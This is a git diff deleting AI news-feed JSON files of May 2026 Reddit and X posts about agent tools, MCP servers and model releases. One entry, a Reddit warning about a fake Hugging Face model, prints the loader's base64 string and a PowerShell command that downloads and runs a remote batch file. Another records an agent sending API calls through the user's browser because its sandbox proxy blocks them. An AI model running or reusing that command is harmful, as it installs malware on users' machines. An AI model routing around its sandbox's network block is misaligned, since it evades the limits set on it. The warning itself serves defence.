"product_launch", - "open_source", - "developer_tool", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-07T21:18:26.000Z", - "summary": "I want to share a fun side project of mine over the past month or so where I tried to build a shell with an AI agent embedded. The embedded agent knows everything happening in the shell so I don't have to keep copy-and-pasting error messages to another coding agent while working in a terminal. Now it has grown into a useful tool in my daily workflow and a fun playground for agent experiments. 
Here I'm showing a new extension I'm building that launches an agent on a floating overlay that can read my terminal and type out commands for me, which I thought was really cool. I can already see lots of application of this idea such as helping me with interactive installation or helping me over an ssh session without remote installation. The project is fully [open source](https://github.com/guanyilun/agent-sh) with mit license, feel free to try it out and build on it. It should support local models as well as cloud models. This overlay feature is an experimental extension that only exists in the example folder. You can point your coding agent to the docs to help you set it up should you want to try it out (be sure to grab both the overlay-agent extension for the floating display and the te…", - "category": "ai_models" - }, - { - "title": "I just tried Reactor's open source world model demo, here are my thoughts", - "url": "https://reddit.com/r/StableDiffusion/comments/1t6qfff/i_just_tried_reactors_open_source_world_model/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-07T23:02:18.000Z", - "summary": "So I recently stumbled upon Reactor's new demo of an open source world model. AFAIK they are not training the models themselves, but they are the infra that powers them and will be offering them via SDK, which will be super interesting to see once this is available via API since so far they've been just text-to-video demos. 
Having tried it extensively, some of my thoughts: * The models are getting very good very fast * This can massively impact industries such as robotics * I am impressed at the visual fidelity of the model * We are still a few years away from anything gaming-related Would love to hear what you all think!", - "category": "creative_tools" - }, - { - "title": "My Claude dreams at night and remembers everything. Better than mempalace.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t5yhio/my_claude_dreams_at_night_and_remembers/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "tool_update" - ], - "matching_tags": [ - "mcp", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-07T03:08:34.000Z", - "summary": "Back in January I got tired of the same thing everyone complains about now you start a new session with Claude and it has no idea who you are. Every time. From scratch. So I built iai-mcp. A local daemon that captures every conversation, organizes it into three memory tiers, and feeds the right context back when you start a new session. No \"remember this.\" No copy-pasting from old chats. It just knows. I've been using it daily with Claude Code since January. Five months. At this point it knows my coding style, my project structures, my preferences things I never explicitly told it to save. It picked them up from conversation and held onto them. It stores everything verbatim, runs neural embeddings locally, encrypts at rest with AES-256, consolidates memory in the background while your machine is idle, and ships every benchmark harness so you can verify the numbers yourself. Verbatim recall above 99%. Retrieval under 100ms. Session-start cost under 3,000 tokens. I didn't release it because I was building it for myself. It worked, so I kept using it. But watching the space blow up made me realize maybe other people want this too. So here it is. Open source. MIT licensed. 
Five months…", - "category": "ai_tools" - }, - { - "title": "Claude Code: the only CLI where scrolling up is a premium feature", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6fwhx/claude_code_the_only_cli_where_scrolling_up_is_a/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-07T16:38:48.000Z", - "summary": "Love Claude Code. Genuinely. It's changed how I work. But can we talk about how in 2026, a $200/month AI coding tool can't do what echo \"hello world\" has done since 1971? If Claude writes more than one screenful of text — which it does approximately always — you scroll up and get... nothing. A beautiful void. Your conversation is gone. It existed briefly, like a Snapchat from your AI pair programmer. This has been reported across at least half a dozen GitHub issues going back months. The \"workarounds\": \\- Ctrl+O transcript mode — congrats, you can now read your conversation history, but Claude is frozen while you do. It's like being told \"you can look at your notes, but only if you stop the meeting.\" \\- iTerm2's \"Save lines to scrollback\" setting — tried it. Same blank screen. Maybe my iTerm is also frustrated. \\- Open in editor with v — so the workflow is: ask Claude a question, read the first half on screen, press Ctrl+O, press v, open vim, scroll to where you were, read the rest, quit vim, go back to Claude. Productivity! The root cause is apparently the alternate screen buffer from the Ink framework. I get it, architectural decisions are hard. 
But this is the equivalent of shi…", - "category": "ai_tools" - }, - { - "title": "why llama.cpp can’t combine speculative decode methods?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t63snn/why_llamacpp_cant_combine_speculative_decode/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-07T07:53:13.000Z", - "summary": "dicking around with the new mtp speculative decode with qwen3.6 27b, and it’s great. but for agentic coding i’ve seen significant improvements from ngram, because a decent fraction of the time (e.g. calling edit tool) the model is just repeating verbatim a section of code that it has already seen before. ngram can speculate on a lot of tokens reeaallly fast in comparison. it’d be great if we could combine them by using them both at the same time, but it looks like if i add them both to the command line arguments, only ngram is active. is there any reason both can’t be used simultaneously? fundamental limitation, or just an implementation limit with a fix on the horizon? EDIT: just looked at the PR again and PmNz8 asked the same question like two hours before i posted this. go give it an updoot! [https://github.com/ggml-org/llama.cpp/pull/22673#issuecomment-4394544777](https://github.com/ggml-org/llama.cpp/pull/22673)", - "category": "ai_models" - }, - { - "title": "ClaudePlaysPokemon Opus 4.7 run ongoing!", - "url": "https://reddit.com/r/ClaudeAI/comments/1t5y6gc/claudeplayspokemon_opus_47_run_ongoing/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-07T02:54:10.000Z", - "summary": "Currently streaming at: [https://www.twitch.tv/claudeplayspokemon](https://www.twitch.tv/claudeplayspokemon) This is a passion project by David Hershey, an Anthropic employee on the Applied AI team. 
He started it in June 2024 to learn agent development, posted updates to an internal Slack, coworkers got hooked, went public when Sonnet 3.7 launched in Feb 2025. Anthropic doesn't own it but promotes it and subsidizes the API costs since Claude is their model. Claude is playing Pokemon Red on a Game Boy emulator, the unmodified 1996 game (with a fan-made full color patch applied so the model can see the screen better). No human input, no walkthrough access, no game knowledge fed in. The system prompt actually tells Claude to distrust its own Pokemon knowledge since the game version may differ from what it knows. It gets a screenshot, a few tools, and md notes files. That's it. The current run is on Opus 4.7, the new flagship that came out three weeks ago. **5 of 8 badges at 15,779 steps**, party led by Ivy the Venusaur at Lv 62 with the rest of the team in the teens (classic overleveled-starter playthrough). For context, Opus 4.5 was at 48,000 steps and still stuck in Silph Co at the…", - "category": "ai_tools" - }, - { - "title": "Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business pr…", - "url": "https://x.com/xai/status/2052193877675983031", - "source": "X / @xai", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-07T01:08:43.000Z", - "summary": "Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. 
It brings higher realism, stronger text rendering, and better creative control for business professionals.", - "category": "ai_tools" - }, - { - "title": "[Open] useknockout - free SOTA background removal + super-res API alternative to remove.bg / Topaz, MIT, runs on Modal", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t5v7uh/open_useknockout_free_sota_background_removal/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-07T00:40:51.000Z", - "summary": "Released v0.6.0 of useknockout this week. Single FastAPI service, 20 endpoints deploys to Modal in one command. **Endpoints** \\- /remove (BiRefNet + pymatting matting refinement) \\- /upscale (Swin2SR or Real-ESRGAN, x2/x4) \\- /face-restore (GFPGAN v1.4) \\- /replace-bg, /remove-batch, /remove-url All weights baked into the Docker image. Self-host on any GPU box, or use the free hosted endpoint and playground at [useknockout.com](http://useknockout.com) (FREE while in Beta) **SDKs all MIT too:** \\- /useknockout/node \\- /useknockout/react \\- /useknockout/cli \\- useknockout (PyPI) Repo: [https://github.com/useknockout/api](https://github.com/useknockout/api) Signup: [www.useknockout.com](http://www.useknockout.com) If you want to add something, PRs welcome - issues open for /colorize next and please feel free to give me yor input! 
would be greatly appreciated!", - "category": "ai_models" - }, - { - "title": "How I made $350K from an open-source JavaScript library using dual licensing", - "url": "https://www.paritydeals.com/blog/monetize-open-source-dual-licensing/", - "source": "Hacker News", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-07T00:47:15.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "11.67% ARC-AGI-2 Local Eval on a Single 4090: The TOPAS Recursive Architecture", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t6n97x/1167_arcagi2_local_eval_on_a_single_4090_the/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-07T20:56:47.000Z", - "summary": "I'm not sure too many people care about the ARC-AGI-2 competition anymore, but still...I thought some might find this interesting. They're running it one last time this year. Everyone is currently leaderboard-stuffing using the winning open-source code from last year. That's why if you take a peak it's really just the same scores clogging it up. We're doing something a bit different though, building a highly efficient, deep-recursion model from scratch. We just hit 11.67% on the public LB, but that's with a massive asterisk. We don't have a cluster. We have **one RTX 4090**. And we're only 14 days or so into training a 100m parameter model. Locally, this checkpoint actually hit 36%. On the Kaggle submission, our TTT is computationally heavy because of the recursive loops. To avoid a total submission timeout, we set the thresholds too high, and the model ended up outputting \\[\\] (null) for nearly half the puzzles...hence the 11.67%. We're trying to show that ARC isn't just a Compute War, but an architecture war. 
Small models using biological memory models can punch way above their weight class if they can handle the reasoning loops. We're tuning the time-management logic tonight an…", - "category": "ai_models" - }, - { - "title": "[SCAM DO NOT USE!!] OpenOSS/privacy-filter", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t6j63p/scam_do_not_use_openossprivacyfilter/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-07T18:31:54.000Z", - "summary": "Hey there! I am about to heavily warn you from [https://huggingface.co/Open-OSS/privacy-filter/](https://huggingface.co/Open-OSS/privacy-filter/) This model is SCAM and downloads MALWARE to your computer!!! Look at [https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py](https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py) If you decode that base64 string (aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FWTk5F) an URL comes out: [https://jsonkeeper.com/b/AVNNE](https://jsonkeeper.com/b/AVNNE) Which contains: { \"cmd\": \"\\[Net.ServicePointManager\\]::SecurityProtocol=\\[Net.SecurityProtocolType\\]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o\" } This is sooo critical! This fake model downloads an EXE and a bat file to your computer! PLEASE: be careful not to use it. 
The real model is here: [https://huggingface.co/openai/privacy-filter](https://huggingface.co/openai/privacy-filter) Thanks for your attention!", - "category": "ai_models" - }, - { - "title": "I trained a NER model on 33,000 Indian Supreme Court judgments (1950–2024) CASE_CITATION hits 97.76% F1, +17 points over the only prior baseline [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t6iax2/i_trained_a_ner_model_on_33000_indian_supreme/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-07T18:01:36.000Z", - "summary": "**TL;DR**: Released en\\_legal\\_ner\\_ind\\_trf v0.1 - InLegalBERT fine-tuned on \\~34,700 silver-annotated chunks from 33k Indian SC judgments. 13 labels. 78.67% overall F1. CASE\\_CITATION at 97.76% already exceeds OpenNyAI's PRECEDENT score by +17 points. Free, Apache-2.0. **Why this exists** OpenNyAI is the only prior Indian legal NER model with any community presence. It's unmaintained and degrades on pre-1990 OCR-era text - the first 40 years of India's constitutional jurisprudence. No replacement existed. **Results** |Entity|F1|Support| |:-|:-|:-| |CASE\\_CITATION|**97.76%**|3,821| |PROVISION|**96.35%**|20,248| |STATUTE|**91.94%**|8,187| |LAWYER|74.67%|3,982| |JUDGE|68.06%|1,978| |DATE|55.15%|3,289| |RESPONDENT|50.44%|1,731| |COURT|50.34%|1,033| |WITNESS|49.77%|762| |OTHER\\_PERSON|47.11%|4,266| |PETITIONER|44.71%|1,573| |ORG|41.34%|2,128| |GPE|36.56% ⚠|1,197| |**micro avg**|**78.67%**|54,195| Evaluated on a held-out validation split (\\~500 documents, stride=512, non-overlapping). The 25-file locked test set is untouched - head-to-head with OpenNyAI runs in v1.0. **Comparison note**: OpenNyAI (RoBERTa + transition-based parser, gold-annotated) achieved 91.1% overall strict F1. 
Not…", - "category": "ai_research" - }, - { - "title": "OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you ex…", - "url": "https://x.com/AILeaksAndNews/status/2052440501421281507", - "source": "X search / AI model updates", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-07T17:28:42.000Z", - "summary": "OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you excited for new voice AI?", - "category": "ai_models" - }, - { - "title": "the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector", - "url": "https://x.com/DaveLimTV/status/2052440075766817143", - "source": "X search / Agent workflows", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-07T17:27:01.000Z", - "summary": "the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector", - "category": "ai_agents" - }, - { - "title": "OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?", - "url": "https://x.com/testingcatalog/status/2052439728838808031", - "source": "X / @testingcatalog", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-07T17:25:38.000Z", - "summary": "OPENAI : 3 new models are now available on OpenAI Playground and APIs. 
- gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-08.json b/data/news-feed-2026-05-08.json deleted file mode 100644 index 464909f..0000000 --- a/data/news-feed-2026-05-08.json +++ /dev/null @@ -1,261 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.433Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-08", - "article_count": 15, - "archived_story_count": 552, - "articles": [ - { - "title": "I built a Pokémon-styled multi-agent dashboard to manage all Claude Code sessions", - "url": "https://reddit.com/r/ClaudeAI/comments/1t7m3j3/i_built_a_pokémonstyled_multiagent_dashboard_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-08T22:00:25.000Z", - "summary": "Like many others here, I got frustrated with managing all my different claude/codex sessions, so i built Pokegents, which is an open source multi-agent workspace for coding agents. It has a Pokemon-themed dashboard/chat interface plus a local orchestration server for managing agent sessions (currently supports Claude Code in iTerm2, plus Claude and Codex through ACP-based chat runtimes), persistent agent identities, mcp messaging between agents, notifications, session cloning, and more. This was mostly a vibe-coded side project, but I've been using it constantly in my day-to-day workflow as an engineer, and its helped me parallelize a lot of my work. My coworkers make fun of me because it looks like I'm just playing Pokemon all day haha. 
I made it open source and sharing in case it might be useful or just fun for anyone to use (links in comment below).", - "category": "ai_tools" - }, - { - "title": "vLLM ROCm has been added to Lemonade as an experimental backend", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t7g70j/vllm_rocm_has_been_added_to_lemonade_as_an/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-08T18:21:15.000Z", - "summary": "vLLM has the ability to run .safetensors LLMs before they are converted to GGUF and represents a new engine to explore. I personally had never tried it out until u/krishna2910-amd/ u/mikkoph and u/sa1sr1 made it as easy as running llama.cpp in Lemonade: ``` lemonade backends install vllm:rocm lemonade run Qwen3.5-0.8B-vLLM ``` This is an experimental backend for us in the sense that the essentials are implemented, but there are known rough edges. We want the community's feedback to see where and how far we should take this. If you find it interesting, please let us know your thoughts! Quick start guide: https://lemonade-server.ai/news/vllm-rocm.html GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk", - "category": "ai_models" - }, - { - "title": "Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now availab…", - "url": "https://x.com/brainmirrorai/status/2052712658236060043", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-08T11:30:09.000Z", - "summary": "Perplexity just shipped Finance Search in the Agent API. 
One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now available in the Perplexity Agent API as a", - "category": "ai_models" - }, - { - "title": "OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 mil…", - "url": "https://x.com/mariusfanu/status/2052712647468917204", - "source": "X search / AI model updates", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-08T11:30:07.000Z", - "summary": "OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 million weekly users, up 8x since early this", - "category": "ai_models" - }, - { - "title": "pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also f…", - "url": "https://x.com/AgentBreak40737/status/2052645145011695940", - "source": "X search / AI model updates", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-08T07:01:53.000Z", - "summary": "pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. 
It also fixes key bugs like streaming response ...", - "category": "ai_models" - }, - { - "title": "Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-…", - "url": "https://x.com/aicontentminds/status/2052637566474883305", - "source": "X search / AI model updates", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-08T06:31:46.000Z", - "summary": "Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-computer-mac/ … #Perplexity #AIagents #Mac", - "category": "ai_models" - }, - { - "title": "I built an MCP server that gives Claude real-time data for all 470+ National Park Service sites", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6pdww/i_built_an_mcp_server_that_gives_claude_realtime/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-07T22:18:56.000Z", - "summary": "I built a free MCP integration for Claude that connects it to live National Park Service data. Instead of answering park questions from training data alone, Claude can pull current NPS alerts, weather, campground info, entrance fees, permits from [Recreation.gov](http://Recreation.gov), and ranger events before responding. It covers 470+ NPS sites, including national parks, monuments, seashores, lakeshores, historic sites, and recreation areas. 
What it includes: * Trip planning with day-by-day itineraries and Google Maps * Park details * Park comparison * Search/discover * Events Claude helped me build and refine the MCP integration, especially around itinerary planning and follow-up trip edits. For example, you can say “add day 4” or “swap this hike for something easier,” and it refines the plan. Setup takes about 30 seconds: Settings → Connectors → Add custom connector → paste the URL Details and screenshots: [https://www.nationalparksexplorerusa.com/mcp](https://www.nationalparksexplorerusa.com/mcp)", - "category": "ai_tools" - }, - { - "title": "Mahoraga - Stop paying Anthropic and OpenAI so much", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6c587/mahoraga_stop_paying_anthropic_and_openai_so_much/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-07T14:27:10.000Z", - "summary": "Are you sick of paying a million credits per month?!?!? I'm joking, i aint that enthusiastic. But really, this saves me a ton of credits by routing simple tasks to local agents. Clone the repo, fork the repo, star the repo, whatever you want. [github.com/pockanoodles/Mahoraga](https://github.com/pockanoodles/Mahoraga) This is Mahoraga, an **open-source** orchestrator that routes tasks across local and cloud AI agents using a contextual bandit (LinUCB) that learns from every decision. Context (skip): I only started integrating AI into my workflows in late 2025, so I came on the scene broke with no credits. This left me with local models. However, many students and employees also receive credits from their institution to work with. (I got claude yippee) I wanted to be able to flawlessly route between models when credits ran out, which made me build an orchestrator. 
I used to use claude more as a chatbot/complete workflow engine, which made it difficult to use local models due to the context window, reasoning, etc. Opus 4.5 running open-source \"superpowers\" ate my usage every month. Now I realize that wasn't an effective way to use claude, or AI in general. I was using claude for bot…", - "category": "ai_tools" - }, - { - "title": "Cowork keeps using browser for API calls", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6bp2q/cowork_keeps_using_browser_for_api_calls/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-07T14:10:47.000Z", - "summary": "My cowork keeps using the browser for API calls. I asked why and got the following response: >The bash sandbox is behind a restrictive proxy that blocks external connections (you can see `X-Proxy-Error: blocked-by-allowlist` in the response). So curl from the sandbox can't reach n8n directly. The browser works because it runs in your actual Chrome session, not the sandboxed environment. It's an infrastructure limitation, not a choice I made. >For the n8n MCP tools, those work for *executing* workflows but not for updating workflow JSON. So the browser is still the only way to do workflow CRUD against your self-hosted n8n. Is there not a way for cowork to do API calls without the browser? Can I give it any suggestion or skill for that?", - "category": "ai_tools" - }, - { - "title": "for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. 
the new chrome plugin allows codex to run its own tabs alongside you…", - "url": "https://x.com/ajambrosino/status/2052560673436282885", - "source": "X / @ajambrosino", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 0.98, - "date": "2026-05-08T01:26:13.000Z", - "summary": "for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you with no interruption. subagents can", - "category": "ai_tools" - }, - { - "title": "CLI, Cowork, or IDE?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6yk0d/cli_cowork_or_ide/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.9700000000000001, - "date": "2026-05-08T05:27:03.000Z", - "summary": "What is the best way to use Claude for programming projects? I started out in the CLI and then tried cowork and eventually decided to use the Claude plugin in vscode. I definitely notice I get different results. I found that when I asked CLI Claude to spin up sub agents to develop specific features on my project, it ended up taking a lot of time and often missed specs. Alternatively, I’ve found the best results by having one instance of Claude cowork be my project manager and have another instance of Claude in VScode be the developer. They communicate through writing in MD files and have to be prompted by me to read them. 
But I’ve found this to be much faster and result in better code.", - "category": "ai_tools" - }, - { - "title": "Tips for improving CLI, or go back to VS Code?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6aonc/tips_for_improving_cli_or_go_back_to_vs_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.8200000000000001, - "date": "2026-05-07T13:32:35.000Z", - "summary": "Hi! I’m a heavy user of Claude Code, enjoying it a lot. I started using it by VS Code, got annoyed over a bug it had with sessions sometimes not saving, tried native Desktop App, found it less optimal, then tried CLI again with WezTerm. I’m currently at a crossroads. I find the CLI terminal experience a little annoying when using it on my PC. I like using it on my mobile device, and using Claude Code via the mobile Claude app if I need to upload images etc, but generally speaking, I feel a bit peeved with the Desktop experience. Often enough, it copies the wrong parts, it ignored CTRL + C and often ignores ALT + V to paste images, etc… I am considering going back to VS Code with the CC extension. Good choice, or are there better alternatives? I did always like VS Code for the GUI in all honesty. I’m even willing to pay for good software. I tried using the Claude Desktop app but I had a lot of issues with file previews and just the… feel? 
Unsure.", - "category": "ai_tools" - }, - { - "title": "What interface are you using for Claude Code?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t66q7v/what_interface_are_you_using_for_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.8200000000000001, - "date": "2026-05-07T10:40:50.000Z", - "summary": "Been using Claude Code in the terminal for about 2 months now and overall loving it but I keep running into small glitches here and there (like keyboard shortcuts randomly stopping to work, newline behavior changing after updates, etc.). Curious what setups others are running. Are you sticking with the terminal, using the desktop app, the VS Code extension, or something else entirely? Also happy to hear if switching to the desktop app actually solved some of these minor annoyances for you.", - "category": "ai_tools" - }, - { - "title": "Flux.2-Klein pipeline for real-time webcam stream processing in 30 FPS", - "url": "https://reddit.com/r/StableDiffusion/comments/1t7nd7e/flux2klein_pipeline_for_realtime_webcam_stream/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-08T22:51:51.000Z", - "summary": "I have built a pipeline based on the Flux.2-Klein-4B model that allows processing of a video stream with low latency (about 0.2 seconds) on a single RTX5090 GPU. It is free and open-source, you can try it locally: [https://github.com/tensorforger/FluxRT](https://github.com/tensorforger/FluxRT) Under the hood, it uses a custom spatial-aware KV-cache, so it only recomputes a small number of image tokens per frame, specifically where something is moving or changing. It also uses frame interpolation with the RIFE model, which can multiply FPS by a factor of 2, 4, 8, etc. I have found that 4 is the most appropriate for my setup. 
Depending on scene dynamics, the output stream achieves up to 50 FPS in mostly static scenes and around 20 FPS when the entire input image is changing rapidly. Benchmark results are in the repo. There is also a Gradio demo, several minimal cv2 examples, and a simple paint-style app with real-time canvas updates.", - "category": "creative_tools" - }, - { - "title": "Qwen 35B-A3B is very usable with 12GB of VRAM", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t7l56a/qwen_35ba3b_is_very_usable_with_12gb_of_vram/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-08T21:22:55.000Z", - "summary": "Hardware: RTX 3060 12GB 32GB DDR4-3200 Windows CUDA 13.x Model: Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf The model is a 35B MoE, so `-ncmoe` matters a lot. Lower `-ncmoe` means more MoE blocks stay on GPU. # Main takeaway **12GB VRAM feels like a very practical size for this model.** It lets you keep enough MoE blocks on GPU that plain decoding becomes quite strong, while still leaving room for useful context sizes like 16k/32k. For prompt processing / prefill, I trust the `llama-bench` numbers more than `llama-cli`’s interactive `Prompt:` line, because `llama-bench` gives a cleaner `pp512` measurement. Best plain `llama-bench` result: -ncmoe 18 -t 9 -ctk q8_0 -ctv q8_0 pp512: ~914 t/s tg128: ~46.8 t/s So raw prefill is very fast on this setup. 
# Best practical coding profile For daily coding, I would use this: llama-cli.exe ^ -m \"Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf\" ^ -p \"...\" ^ -n 512 ^ -c 32768 ^ --temp 0 --top-k 1 ^ -ngl 999 -ncmoe 20 ^ -fa on ^ -ctk q8_0 -ctv q8_0 ^ --no-mmap ^ --no-jinja ^ -t 9 ^ --perf Result: Context: 32k Prompt: ~88.9 t/s in llama-cli Generation: ~43.4 t/s VRAM free: ~273 MiB This is a nice balance: large enough context for coding, still fast, and not completely out o…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-09.json b/data/news-feed-2026-05-09.json deleted file mode 100644 index 2a241b0..0000000 --- a/data/news-feed-2026-05-09.json +++ /dev/null @@ -1,257 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.627Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-09", - "article_count": 15, - "archived_story_count": 631, - "articles": [ - { - "title": "Exactly a year ago, I started working on an MCP server I launched on reddit that became by far my most active open source project!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t8olv3/exactly_a_year_ago_i_started_working_on_an_mcp/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "open_source", - "tool_update" - ], - "matching_tags": [ - "mcp", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-09T22:08:54.000Z", - "summary": "This isn't an advertisement, and it's very much local and open - I already don't have enough time to keep up with the existing pull requests and issues... just a fond look back on how much this space has grown and 